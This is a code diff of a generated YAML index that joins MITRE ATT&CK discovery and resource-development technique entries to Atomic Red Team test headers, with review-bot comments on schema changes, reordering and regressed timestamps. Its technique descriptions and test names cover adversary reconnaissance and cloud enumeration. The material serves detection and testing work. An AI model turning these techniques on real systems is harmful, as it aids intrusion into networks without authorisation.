name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -105386,7 +106077,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests:
- name: Permission Groups Discovery (Local)
@@ -105538,7 +106228,7 @@ discovery:
name: sh
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -105549,28 +106239,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
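Review bot: three platforms (Identity Provider, SaaS, Office Suite) are added to T1201 here alongside the 1.5 -> 1.6 version bump, so any per-platform index or filter built from x_mitre_platforms has to be regenerated in the same change or it will miss this technique for those platforms. The rest of the hunk (x_mitre_contributors, x_mitre_deprecated, x_mitre_domains and x_mitre_is_subtechnique moved above x_mitre_platforms, x_mitre_version moved below it) is key-order churn with no content change; if the generator emitted keys in a stable sorted order, this diff would shrink to the three added platforms and the version line.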
@@ -105603,9 +106296,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests:
- name: Examine password complexity policy - Ubuntu
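Review bot: `spec_version: '2.1'` is dropped from the T1201 object while `x_mitre_attack_spec_version` moves 2.1.0 -> 3.2.0, and the same spec_version removal repeats for every technique in this file. STIX 2.1 requires spec_version on each SDO, so anything that validates these entries as STIX objects, or keys off spec_version to pick a parser, now sees a missing key. If the index is only consumed by the project's own tooling that is acceptable, but the PR description should state that the upstream bundle format changed rather than leaving reviewers to infer it from the removals.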
@@ -105833,7 +106525,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
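Review bot: the `modified` timestamp for T1614.001 moves backwards, from 2022-04-25 to 2021-10-15, and the same regression appears below for T1012 (2023-05-09 -> 2023-04-03), T1622 (2022-05-11 -> 2022-04-16), T1583.002 (2022-04-25 -> 2021-04-15) and T1587.003 (2022-04-25 -> 2021-10-16). Combined with the spec_version removals this means the index was regenerated from a different upstream STIX bundle, not a newer revision of the same one; the PR description should name which bundle and ATT&CK release the generator now reads, otherwise a later diff against this file will read these dates as data corruption.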
@@ -105872,8 +106564,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests:
- name: Discover System Language by Registry Query
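Review bot: after this hunk T1614.001 carries neither `spec_version` nor `x_mitre_attack_spec_version`, while neighbouring techniques keep `x_mitre_attack_spec_version` at 3.1.0 or 3.2.0 (T1012 in the next hunk keeps 3.1.0). Any consumer that reads the attack spec version to decide how to interpret an object's fields must treat the key as optional and default sensibly instead of failing on the first object that lacks it; T1583.002 further down ends up in the same state.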
@@ -106028,7 +106718,7 @@ discovery:
command: PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -106069,7 +106759,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests:
- name: Query Registry
@@ -106218,82 +106907,81 @@ discovery:
'
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests:
- name: Get geolocation info through IP-Lookup services using curl Windows
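Review bot: `x_mitre_permissions_required: [User]` is removed from T1614 while its sub-technique T1614.001 above still carries the field, so filters or reports that group techniques by required permission will silently lose the parent. The reference changes are content-neutral (the FBI Ragnar Locker PDF moves from assets.documentcloud.org to s3.documentcloud.org with a new retrieved date; the rest are reorders), `revoked: false` and `x_mitre_deprecated: false` become explicit, and the 1.0 -> 1.1 bump is the only other substantive change; most of the roughly 80 changed lines are key and reference reordering.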
@@ -106403,7 +107091,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests:
- name: Security Software Discovery
@@ -106576,12 +107263,12 @@ discovery:
'
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
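Review bot: the rewritten T1526 description now says "Microsoft Graph API" but keeps `(Citation: Azure AD Graph API)` on the same sentence, so the reference attached to the claim is still the Azure AD Graph documentation. That wording comes from upstream ATT&CK and this file is generated, so it should not be hand-edited here; if anyone wants the citation aligned with the text, the place to fix it is the upstream technique, not this index.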
@@ -106589,10 +107276,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
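Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted between kill_chain_phases and x_mitre_contributors for T1526, whereas for other techniques in this file the same key sits next to x_mitre_modified_by_ref near the end of the object (T1538, T1622 and T1124 below). The generator evidently preserves whatever key order the upstream object has, which is why a single version bump shows up as a remove-here/add-there pair; sorting keys on output would make these diffs reviewable. The added contributor line is fine.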
@@ -106601,15 +107290,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
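Review bot: the platform values `Azure AD`, `Office 365` and `Google Workspace` are replaced by `Office Suite` and `Identity Provider` for T1526, so any mapping, filter or per-platform index that matches on the old literal strings stops matching this technique; update those mappings in the same change (T1538 gets the same rename below). The added data source `Logon Session: Logon Session Creation` is consistent with the detection text, and the 1.3 -> 1.4 bump is expected for a platform change.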
@@ -106637,9 +107327,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests:
- name: Azure - Dump Subscription Data with MicroBurst
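Review bot: of the three lines removed here only `spec_version: '2.1'` is actually dropped; `x_mitre_attack_spec_version` (now 3.2.0) and `x_mitre_modified_by_ref` reappear earlier in the same T1526 object. A reviewer reading this hunk on its own would conclude the spec and modifier fields were lost, so the PR description should call out the reorder.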
@@ -106774,7 +107461,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests:
- name: Remote System Discovery - net
@@ -107335,7 +108021,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests:
- name: Port Scan
@@ -107675,7 +108360,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests:
- name: Find and Display Internet Explorer Browser Version
@@ -107755,7 +108439,7 @@ discovery:
name: powershell
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -107776,12 +108460,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -107806,7 +108489,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
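Review bot: T1538 ends with `atomic_tests: []` directly after `x_mitre_modified_by_ref` and has no `identifier:` line, whereas techniques with tests (T1201, T1614, T1526 above) carry `identifier: <ID>` before `atomic_tests:`. The other empty entries in this file (T1583, T1583.007, T1588.007 below) have the same shape, so this looks intentional, but a consumer that reads `identifier` to join a technique back to its tests must not assume the key exists when the test list is empty.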
@@ -107861,7 +108543,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -107881,7 +108563,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests:
- name: Detect a Debugger Presence in the Machine
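Review bot: T1622 keeps `x_mitre_attack_spec_version: 2.1.0` (the unchanged context line just above the removed spec_version) while most techniques in this file are bumped to 3.2.0, and its `modified` date moves back to 2022-04-16, so the file now mixes objects from different attack spec versions. That is a property of the upstream bundle rather than a generator bug, but parsing has to be per object rather than assuming one spec version for the whole index.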
@@ -107996,7 +108677,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests:
- name: System Time Discovery
@@ -108072,7 +108752,7 @@ discovery:
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -108083,7 +108763,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
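Review bot: the contributor rename `Goldstein Menachem` -> `Menachem Goldstein` is an upstream correction and is repeated for T1583.008 below; if any contributor aggregation is run over this file it should be re-run so the two spellings are not counted as separate people.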
@@ -108154,29 +108834,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
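Review bot: the T1583.007 description now references `(Citation: GWS Apps Script Abuse 2021)`, which needs a matching `GWS Apps Script Abuse 2021` entry in external_references; it is added in the following hunk, so the pair is complete. The new link to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) is a cross-reference only and needs nothing here. Apart from the description and the 1.0 -> 1.1 bump, the hunk is a key reorder (x_mitre_detection, x_mitre_platforms, x_mitre_is_subtechnique and x_mitre_contributors swap places) with no content change.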
@@ -108200,15 +108879,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
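Review bot: the new URL for `GWS Apps Script Abuse 2021` ends in `#google_vignette`, a fragment appended by BleepingComputer's ad interstitial that is not part of the article's canonical address. It comes from upstream ATT&CK, so leave the generated line as is and report it upstream; stripping it locally would only be undone by the next regeneration.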
@@ -108240,17 +108922,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -108303,11 +108984,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
